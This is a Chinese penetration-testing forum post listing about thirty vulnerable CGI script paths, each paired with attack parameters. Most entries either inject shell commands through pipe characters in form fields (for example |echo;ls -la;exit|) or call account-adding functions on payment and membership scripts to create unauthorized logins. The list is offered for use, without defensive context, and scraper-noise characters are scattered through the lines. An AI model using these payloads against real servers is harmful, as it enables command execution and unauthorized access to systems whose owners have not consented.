找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Cgi-bin 30个漏洞+使用方法
返回列表 发新帖
查看: 3331|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
==============================
* x" `0 H5 c, {& Y+ o1 C. i4 L# i5 j3 H- \* y8 f6 ^
/smspass.pl
; Q" t- t' z; H8 L1 L9 nusername=username&password=password. v" B% H( j) z4 W* \6 t
8 w6 ~( c# \( t3 R5 b/ l
/index.cgi# B5 H! U' r- T% V1 Z3 s5 E
wei=ren&gen=command
5 w/ {3 D, @% i; E+ [  j& H% O1 ~. z4 s" b$ M# J
/passmaster.cgi0 \1 R0 v  p# d4 s5 |% ~
Action=Add&Username=Username&Password=Password5 O& q" P; y2 t/ s

; E# J. j$ }( @% s8 E& \  D/accountcreate.cgi
- P( j$ N2 c: ]% J: ~username=username&password=password&ref1=|echo;ls|
) f" ~8 M& z7 Y; g% A) k3 p/ s0 p0 s; Q& u9 @( F
/form.cgi" p4 }! d  U( S3 ^* {. u4 s
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
, N! ]; C+ Q; d6 ]* O0 A3 ?8 b
, y9 {- @) d3 Z* v6 \. ^/addusr.pl5 T/ Z9 @& b( e9 ?9 t: J
/cgi-bin/EuroDebit/addusr.pl
! P5 P' {( G8 ^) G% p7 k) Wuser=username&pass=Password&confirm=Password: ]6 m3 r: k" P( y& Y& H; O0 c

; h* Z4 d# m/ M$ ^  k* Q/ccbill-local.asp9 a& {  G7 O5 a5 y" D* i
post_values=username:password( X# v, P4 c3 `  ~. K3 n
( y3 Y' {6 G; t! I9 ]
/count.cgi
, r7 d% C' _% r5 E& Z3 m- @8 G  zpinfile=|echo;ls -la;exit|. z# [, A. S8 |3 g4 |

+ l) f  W3 v4 d* s1 q, H9 U/recon.cgi
1 Y" [( o* o+ d  h, e& ?/recon.cgi?search" f! _5 |8 s1 N& ~/ m, p' [$ o0 F
searchoption=1&searchfor=|echo;ls -al;exit|* d9 F/ {- f7 A; E

. m: Q; a* O/ L. K7 B/verotelrum.pl% J1 a& [% K; b; J
vercode=username:password:dseegsow:add:amount<&30>
; z% [: U' t" u1 R! N9 |4 V, D& m; h. `% |' k. M" y4 B$ Q% z' ]% ~
/af.cgi* B7 D8 J+ r5 l" g* ?: ]" {
_browser_out=|echo;ls -la;exit;|
3 @1 h+ N  J* }- v1 D/ T
( b/ W: ^, k0 L# g5 w% T  }/modify.cgi# V6 F/ w) C& H* v: p2 L
username=username&password=password&expire=30
: H  l0 i# p9 Y7 i8 e" e* E+ k. S# Z
/openjournal.cgi
. R& J, L# ?, w/ i( n, Nedit=1&ct=2&go=|echo;ls -al;exit|
! e2 p1 q6 S$ c; r' x) p1 M' X9 i; ~
/gx9passwd.cgi
2 i. r# a: R7 u, [cmd=ADD&user=username&pass=password
& g2 J% _% q' I$ a1 D
6 W# S; f& ]9 e  ~( A/probecontrol.cgi
! u; a- \, {% L. Pcommand=enable&username=username&password=password
% M! e$ Z0 B2 ?2 }4 L* n
1 ^! X8 H- B2 {! z/recon.cgi8 |' q( r9 j+ r+ P1 b9 [
searchoption=3&searchfor=echo;ls -la;exit2 \( d$ i5 |, ]8 `

3 F, F3 H9 o' y7 \( |0 {7 c. m/htadd.pl0 k3 F* U- V- Q+ C# f" o8 o3 J3 H
configfile=|echo; ls -alt; exit- Q8 R/ l, b, w* B+ x

- {. d7 p( g: n4 e! n/gx9passwd.cgi! w2 K3 K4 H) l5 C: @/ b3 H1 f4 r
cmd=ADD&user=username&pass=password! o5 w' ~" R( Y3 b8 A- I0 [
: ]  J( b: U2 V: Z1 N5 o7 d% Q( G1 H
/ibill*.pl' z! X0 C4 O( W  h  Z
reqtype=add&authpwd=authpwd&username=username&password=password4 m2 w1 Z9 q+ S! i, [
/ F8 I' F  \' v, {& G
/cpay.cgi
$ x- Y4 e- Z  q* K: O: \# jcommand=add_member&username=username(EMAIL)&password=password(DES)
+ i7 M" E) h% L. F' N0 @2 Y+ }% l( Q; ~
/globill_ut.cgi4 O* _  h, x; `, z+ d
do=add&username=username&password=password&wpassword=password
9 W: C) H9 X$ Z) Z2 `
& Z2 `6 l3 I7 Z1 y# {- j- M1 U3 d/usercontrol.cgi
& o9 _8 H7 [( V1 L3 Zcommand=enable&username=USER&password=PASS% {4 B: C% a$ L5 P
) ^$ Y3 }$ t% O" F
/globoSALErum.cgi
" n4 `- |4 m( g* Daction=ADD&seccode=seccode&login=username&password=password/ e* m* T) v( e8 Y5 ]- I6 t7 N) M1 }
# P4 t7 I3 h$ q: t$ L7 y% @5 f
/addusr.pl
, z0 x0 g% O' x( Buser=USER&pass=PASS&confirm=PASS& N9 p7 X7 b. V; K# f9 h* c, @. I1 F

% @( k5 g/ N+ l9 ?$ b/pincount.cgi) y0 H) D/ R8 D( d; V
/cgi-bin/mastergate/pincount.cgi
# Q4 m# n; H' Kpinfile=|echo;pwd;exit|0 K0 u" R, U8 Z0 n2 _: d
- U. C, A5 }6 h+ \  n: S# X
/accountcreate.cgi! g& Y2 K0 u& m# s( |& S
/cgi-bin/gateway/accountcreate.cgi
2 ^; ]$ I8 R5 jusername=username&password=password&password2=password&ref1=|echo;ls -al;exit* D  [) J$ f: J6 d7 {

. v' k9 y& ^" w0 T/af.cgi3 L! q! f9 j0 `- E! s2 z
/env.cgi
& l; P9 n' e$ Q: ?6 yADD+;echo;pwd;exit" q, e6 ]" b, \% h0 U' d0 q3 r/ H2 R
5 f5 l+ t4 R' d/ F. [
/count.cgi
! r, x8 V! z* Q: p# `7 `: v: Lpinfile=|echo;pwd;exit|
9 ^  J- \: T- D( D- H8 P8 A0 y! p' F* a
/recon.cgi, o: F) c, N" l) V$ |% g- [
searchoption=1&searchfor=|echo;ls%20-al;exit|
/ [5 s4 _+ _/ I/ L, s
4 w: R: I  J! @' ~2 f/add.cgi6 `7 j$ J! B& W) X5 o0 g
username=username&password=password&expire=30' E( N; K1 i# A0 j
; c/ c# Z  Y! {( C6 l" n
==============================9 d3 E+ F; f  U6 o. d( L0 C
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表